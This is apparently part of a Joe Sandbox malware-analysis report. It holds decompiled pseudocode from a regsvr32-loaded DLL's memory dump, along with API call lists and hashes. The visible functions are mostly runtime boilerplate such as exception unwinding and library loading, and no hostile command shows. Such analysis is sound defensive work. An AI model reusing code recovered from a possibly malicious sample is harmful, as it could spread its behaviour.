                                                                                                                                                                                                            				goto 0x80003565;
                                                                                                                                                                                                            				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
                                                                                                                                                                                                            				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
                                                                                                                                                                                                            				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
                                                                                                                                                                                                            				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
                                                                                                                                                                                                            				 *(_t284 + 0x38) = _t282 - 0x60;
                                                                                                                                                                                                            				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
                                                                                                                                                                                                            				 *(_t284 + 0x28) = _t282 - 8;
                                                                                                                                                                                                            				 *(_t284 + 0x20) = _t280;
                                                                                                                                                                                                            				E00000001180003254(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
                                                                                                                                                                                                            				goto 0x80003664;
                                                                                                                                                                                                            				goto 0x80003668;
                                                                                                                                                                                                            				r15d = 0;
                                                                                                                                                                                                            				r13d = r13d + 1;
                                                                                                                                                                                                            				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0x800034fd;
                                                                                                                                                                                                            				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003784;
                                                                                                                                                                                                            				_t209 = _t280[8] - r15d;
                                                                                                                                                                                                            				if (_t209 == 0) goto 0x8000369e;
                                                                                                                                                                                                            				E00000001180002408(_t282 - 8);
                                                                                                                                                                                                            				if (_t209 != 0) goto 0x800036bf;
                                                                                                                                                                                                            				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003784;
                                                                                                                                                                                                            				if (E00000001180001FD8(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0x80003784;
                                                                                                                                                                                                            				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0x800037da;
                                                                                                                                                                                                            				if (_t280[8] == r15d) goto 0x800036e4;
                                                                                                                                                                                                            				E00000001180002408(_t282 - 8 + _t280[8]);
                                                                                                                                                                                                            				_t235 = _t280[8];
                                                                                                                                                                                                            				goto 0x800036e7;
                                                                                                                                                                                                            				if (E00000001180004314(_t235, _t237, _t237, _t313, _t281) != 0) goto 0x80003784;
                                                                                                                                                                                                            				E00000001180002068(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
                                                                                                                                                                                                            				_t177 =  *((intOrPtr*)(_t282 + 0x98));
                                                                                                                                                                                                            				 *(_t284 + 0x50) = _t177;
                                                                                                                                                                                                            				_t178 = _t177 | 0xffffffff;
                                                                                                                                                                                                            				 *((long long*)(_t284 + 0x48)) = _t281;
                                                                                                                                                                                                            				 *(_t284 + 0x40) = _t313;
                                                                                                                                                                                                            				 *(_t284 + 0x38) = _t178;
                                                                                                                                                                                                            				 *(_t284 + 0x30) = _t178;
                                                                                                                                                                                                            				 *(_t284 + 0x28) = _t280;
                                                                                                                                                                                                            				 *(_t284 + 0x20) = _t313;
                                                                                                                                                                                                            				E00000001180002274( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
                                                                                                                                                                                                            				goto 0x80003784;
                                                                                                                                                                                                            				if (_t280[3] <= 0) goto 0x80003784;
                                                                                                                                                                                                            				if ( *((char*)(_t282 + 0x98)) != 0) goto 0x800037f7;
                                                                                                                                                                                                            				 *(_t284 + 0x38) = _t307;
                                                                                                                                                                                                            				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
                                                                                                                                                                                                            				 *(_t284 + 0x28) = r14d;
                                                                                                                                                                                                            				 *(_t284 + 0x20) = _t280;
                                                                                                                                                                                                            				E00000001180003800(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
                                                                                                                                                                                                            				_t173 = E00000001180002D40(_t235);
                                                                                                                                                                                                            				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0x800037f7;
                                                                                                                                                                                                            				return E000000011800010B0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
                                                                                                                                                                                                            			}

































                                                                                                                                                                                                            0x1800034f1
                                                                                                                                                                                                            0x1800034f5
                                                                                                                                                                                                            0x1800034f9
                                                                                                                                                                                                            0x180003508
                                                                                                                                                                                                            0x180003517
                                                                                                                                                                                                            0x180003521
                                                                                                                                                                                                            0x180003524
                                                                                                                                                                                                            0x180003528
                                                                                                                                                                                                            0x18000352f
                                                                                                                                                                                                            0x180003539
                                                                                                                                                                                                            0x180003540
                                                                                                                                                                                                            0x180003546
                                                                                                                                                                                                            0x18000354c
                                                                                                                                                                                                            0x180003554
                                                                                                                                                                                                            0x180003558
                                                                                                                                                                                                            0x18000355f
                                                                                                                                                                                                            0x180003568
                                                                                                                                                                                                            0x18000356c
                                                                                                                                                                                                            0x180003570
                                                                                                                                                                                                            0x180003574
                                                                                                                                                                                                            0x180003578
                                                                                                                                                                                                            0x18000357b
                                                                                                                                                                                                            0x18000358c
                                                                                                                                                                                                            0x18000358f
                                                                                                                                                                                                            0x180003594
                                                                                                                                                                                                            0x1800035a1
                                                                                                                                                                                                            0x1800035a4
                                                                                                                                                                                                            0x1800035aa
                                                                                                                                                                                                            0x1800035ac
                                                                                                                                                                                                            0x1800035c7
                                                                                                                                                                                                            0x1800035d2
                                                                                                                                                                                                            0x1800035d8
                                                                                                                                                                                                            0x1800035de
                                                                                                                                                                                                            0x1800035e0
                                                                                                                                                                                                            0x1800035e6
                                                                                                                                                                                                            0x1800035e8
                                                                                                                                                                                                            0x1800035ee
                                                                                                                                                                                                            0x1800035f4
                                                                                                                                                                                                            0x180003612
                                                                                                                                                                                                            0x18000361a
                                                                                                                                                                                                            0x180003622
                                                                                                                                                                                                            0x18000362d
                                                                                                                                                                                                            0x180003635
                                                                                                                                                                                                            0x18000363e
                                                                                                                                                                                                            0x180003647
                                                                                                                                                                                                            0x18000364c
                                                                                                                                                                                                            0x180003651
                                                                                                                                                                                                            0x180003656
                                                                                                                                                                                                            0x18000365d
                                                                                                                                                                                                            0x180003668
                                                                                                                                                                                                            0x18000366b
                                                                                                                                                                                                            0x180003672
                                                                                                                                                                                                            0x180003684
                                                                                                                                                                                                            0x18000368a
                                                                                                                                                                                                            0x18000368e
                                                                                                                                                                                                            0x180003690
                                                                                                                                                                                                            0x18000369c
                                                                                                                                                                                                            0x1800036a6
                                                                                                                                                                                                            0x1800036b9
                                                                                                                                                                                                            0x1800036c7
                                                                                                                                                                                                            0x1800036d1
                                                                                                                                                                                                            0x1800036d3
                                                                                                                                                                                                            0x1800036db
                                                                                                                                                                                                            0x1800036e2
                                                                                                                                                                                                            0x1800036f1
                                                                                                                                                                                                            0x180003704
                                                                                                                                                                                                            0x180003709
                                                                                                                                                                                                            0x18000371a
                                                                                                                                                                                                            0x18000371e
                                                                                                                                                                                                            0x180003721
                                                                                                                                                                                                            0x180003726
                                                                                                                                                                                                            0x18000372b
                                                                                                                                                                                                            0x18000372f
                                                                                                                                                                                                            0x180003736
                                                                                                                                                                                                            0x18000373b
                                                                                                                                                                                                            0x180003740
                                                                                                                                                                                                            0x180003745
                                                                                                                                                                                                            0x18000374b
                                                                                                                                                                                                            0x180003754
                                                                                                                                                                                                            0x180003763
                                                                                                                                                                                                            0x18000376b
                                                                                                                                                                                                            0x180003772
                                                                                                                                                                                                            0x18000377a
                                                                                                                                                                                                            0x18000377f
                                                                                                                                                                                                            0x180003784
                                                                                                                                                                                                            0x18000378e
                                                                                                                                                                                                            0x1800037af

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
• Instruction ID: 68369fba8b053f101f7a0a57f2a328d7db6ec17b1fffbc4fe0a5b608d0144455
• Opcode Fuzzy Hash: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
• Instruction Fuzzy Hash: C0E1B272604B888AEBA6DF66D4423DD77A4F749BC8F008116FE8957B96CF34D698C700
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                            			E0000000118000A3DC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                            				signed long long _t56;
                                                                                                                                                                                                            				intOrPtr _t60;
                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                            				signed long long _t72;
                                                                                                                                                                                                            				long long _t78;
                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                            				signed long long _t88;
                                                                                                                                                                                                            				signed long long _t89;
                                                                                                                                                                                                            				signed long long _t90;
                                                                                                                                                                                                            				WCHAR* _t91;
                                                                                                                                                                                                            				long _t94;
                                                                                                                                                                                                            				void* _t97;
                                                                                                                                                                                                            				WCHAR* _t102;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				 *((long long*)(_t82 + 8)) = __rbx;
                                                                                                                                                                                                            				 *((long long*)(_t82 + 0x10)) = _t78;
                                                                                                                                                                                                            				 *((long long*)(_t82 + 0x18)) = __rsi;
                                                                                                                                                                                                            				r15d = __ecx;
                                                                                                                                                                                                            				_t72 = _t71 | 0xffffffff;
                                                                                                                                                                                                            				_t89 =  *0x80021010; // 0xc23e8d4af72c
                                                                                                                                                                                                            				_t88 =  *(0x180000000 + 0x226f0 + _t102 * 8) ^ _t89;
                                                                                                                                                                                                            				asm("dec ecx");
                                                                                                                                                                                                            				if (_t88 == _t72) goto 0x8000a51f;
                                                                                                                                                                                                            				if (_t88 == 0) goto 0x8000a441;
                                                                                                                                                                                                            				_t56 = _t88;
                                                                                                                                                                                                            				goto 0x8000a521;
                                                                                                                                                                                                            				if (__r8 == __r9) goto 0x8000a504;
                                                                                                                                                                                                            				_t60 =  *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8));
                                                                                                                                                                                                            				if (_t60 == 0) goto 0x8000a469;
                                                                                                                                                                                                            				if (_t60 != _t72) goto 0x8000a55e;
                                                                                                                                                                                                            				goto 0x8000a4f0;
                                                                                                                                                                                                            				r8d = 0x800;
                                                                                                                                                                                                            				LoadLibraryExW(_t102, _t97, _t94);
                                                                                                                                                                                                            				if (_t56 != 0) goto 0x8000a53e;
                                                                                                                                                                                                            				if (GetLastError() != 0x57) goto 0x8000a4de;
                                                                                                                                                                                                            				_t14 = _t56 - 0x50; // -80
                                                                                                                                                                                                            				_t35 = _t14;
                                                                                                                                                                                                            				r8d = _t35;
                                                                                                                                                                                                            				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
                                                                                                                                                                                                            				r8d = _t35;
                                                                                                                                                                                                            				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
                                                                                                                                                                                                            				r8d = 0;
                                                                                                                                                                                                            				LoadLibraryExW(_t91, _t71);
                                                                                                                                                                                                            				if (_t56 != 0) goto 0x8000a53e;
                                                                                                                                                                                                            				 *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8)) = _t72;
                                                                                                                                                                                                            				if (__r8 + 4 != __r9) goto 0x8000a44a;
                                                                                                                                                                                                            				_t90 =  *0x80021010; // 0xc23e8d4af72c
                                                                                                                                                                                                            				asm("dec eax");
                                                                                                                                                                                                            				 *(0x180000000 + 0x226f0 + _t102 * 8) = _t72 ^ _t90;
                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                            			}


















                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                            • Opcode ID: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                                                                                                                            • Instruction ID: 4cb29e05f73c92bcfdeebd25cdbb701ff5eb44b215489781f60aaecc25d2491e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED41D032715A0856FBA7CB16AC047D53391B78EBE0F09C225BD1D47798EE38C64D8300
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                            			E000000011800045BC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                            				intOrPtr _t65;
                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                                                            				struct HINSTANCE__* _t81;
                                                                                                                                                                                                            				long long _t85;
                                                                                                                                                                                                            				void* _t89;
                                                                                                                                                                                                            				struct HINSTANCE__* _t94;
                                                                                                                                                                                                            				long _t97;
                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                            				signed long long _t101;
                                                                                                                                                                                                            				WCHAR* _t104;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				 *((long long*)(_t89 + 8)) = __rbx;
                                                                                                                                                                                                            				 *((long long*)(_t89 + 0x10)) = _t85;
                                                                                                                                                                                                            				 *((long long*)(_t89 + 0x18)) = __rsi;
                                                                                                                                                                                                            				_t101 = _t100 | 0xffffffff;
                                                                                                                                                                                                            				_t61 =  *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8));
                                                                                                                                                                                                            				if (_t61 == _t101) goto 0x800046eb;
                                                                                                                                                                                                            				if (_t61 != 0) goto 0x800046ed;
                                                                                                                                                                                                            				if (__r8 == __r9) goto 0x800046e3;
                                                                                                                                                                                                            				_t67 =  *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8));
                                                                                                                                                                                                            				if (_t67 == 0) goto 0x8000462e;
                                                                                                                                                                                                            				if (_t67 != _t101) goto 0x800046c5;
                                                                                                                                                                                                            				goto 0x80004699;
                                                                                                                                                                                                            				r8d = 0x800;
                                                                                                                                                                                                            				LoadLibraryExW(_t104, _t100, _t97);
                                                                                                                                                                                                            				_t68 = _t61;
                                                                                                                                                                                                            				if (_t61 != 0) goto 0x800046a5;
                                                                                                                                                                                                            				if (GetLastError() != 0x57) goto 0x80004687;
                                                                                                                                                                                                            				_t14 = _t68 + 7; // 0x7
                                                                                                                                                                                                            				r8d = _t14;
                                                                                                                                                                                                            				if (E00000001180007070(__r8) == 0) goto 0x80004687;
                                                                                                                                                                                                            				r8d = 0;
                                                                                                                                                                                                            				LoadLibraryExW(??, ??, ??);
                                                                                                                                                                                                            				if (_t61 != 0) goto 0x800046a5;
                                                                                                                                                                                                            				 *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8)) = _t101;
                                                                                                                                                                                                            				goto 0x8000460c;
                                                                                                                                                                                                            				_t21 = 0x180000000 + 0x221f0 + __rsi * 8;
                                                                                                                                                                                                            				_t65 =  *_t21;
                                                                                                                                                                                                            				 *_t21 = _t61;
                                                                                                                                                                                                            				if (_t65 == 0) goto 0x800046c5;
                                                                                                                                                                                                            				FreeLibrary(_t94);
                                                                                                                                                                                                            				GetProcAddress(_t81);
                                                                                                                                                                                                            				if (_t65 == 0) goto 0x800046e3;
                                                                                                                                                                                                            				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t65;
                                                                                                                                                                                                            				goto 0x800046ed;
                                                                                                                                                                                                            				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t101;
                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                            			}

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004641
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 000000018000464F
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004679
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046BF
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046CB
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                            • Opcode ID: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                                                                                                                            • Instruction ID: a281eee05f5572a15ea3fe0403c4f12dabc44bbec878773a6143b276462e3048
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F31F276302B48A1EE93DB02A8007D533E4B70DBE4F598625BE2D0B3A0EF39C24C8705
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                            • Opcode ID: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                                                                                                                            • Instruction ID: c3c6b15d1e2a8e36adeeaa1ee2c0ab8803bf36c1bad1bc725f34006b2089cb00
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5214F3470668C42FAE7E73195553ED72926B6C7F0F58C624B83A07BDBDE6C8A494700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                            • Opcode ID: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                                                                                                                            • Instruction ID: 0de398e34c1669cec19602a54f8a011ae7faefe96049ea3591aa14d2bab58b4a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F115B31610F4886E7939B52F85439A73A0F79CBE4F048225FA5E87BA4CF78CA488740
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0000C23E8D4AF72C,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F3F
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,0000C23E8D4AF72C,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F75
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,0000C23E8D4AF72C,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FA2
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,0000C23E8D4AF72C,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FB3
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,0000C23E8D4AF72C,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FC4
                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,0000C23E8D4AF72C,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FDF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                            • Opcode ID: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                                                                                                                            • Instruction ID: b3640c739d53f521f3aff5ec24f9b4829142f54ff52cb57a8f227eaee239dcc8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72115C3070964942FAEBE32195453F972926B9C7F0F18C625B83A077DBDE68C6498701
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LoadMessage$StringTranslate$AcceleratorClassCreateCursorDispatchRegisterWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1967609040-0
                                                                                                                                                                                                            • Opcode ID: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                                                                                                                            • Instruction ID: 677205889e0bc738131920ca4d71d6e0d0c6d5bcb4ac294ec7d30bf60c9b59c6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8611B932614E89D2E7A2DB61F8517DA7361F7D8784F508121FA8947A79DF3CC7198B00
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 63%
                                                                                                                                                                                                            			E00000001180003B5C(void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                            				long long _v40;
                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                            				signed int* _v56;
                                                                                                                                                                                                            				void* _t55;
                                                                                                                                                                                                            				intOrPtr _t60;
                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                            				intOrPtr _t111;
                                                                                                                                                                                                            				signed int* _t115;
                                                                                                                                                                                                            				intOrPtr* _t136;
                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                            				void* _t142;
                                                                                                                                                                                                            				void* _t144;
                                                                                                                                                                                                            				void* _t158;
                                                                                                                                                                                                            				void* _t159;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_t109 = _t144;
                                                                                                                                                                                                            				 *((long long*)(_t109 + 8)) = __rbx;
                                                                                                                                                                                                            				 *((long long*)(_t109 + 0x10)) = __rbp;
                                                                                                                                                                                                            				 *((long long*)(_t109 + 0x18)) = __rsi;
                                                                                                                                                                                                            				 *((long long*)(_t109 + 0x20)) = __rdi;
                                                                                                                                                                                                            				_t136 = __rcx;
                                                                                                                                                                                                            				_t139 = __r9;
                                                                                                                                                                                                            				_t159 = __r8;
                                                                                                                                                                                                            				_t142 = __rdx;
                                                                                                                                                                                                            				E00000001180004584(_t55, __r8);
                                                                                                                                                                                                            				E00000001180002D40(_t109);
                                                                                                                                                                                                            				_t115 = _a40;
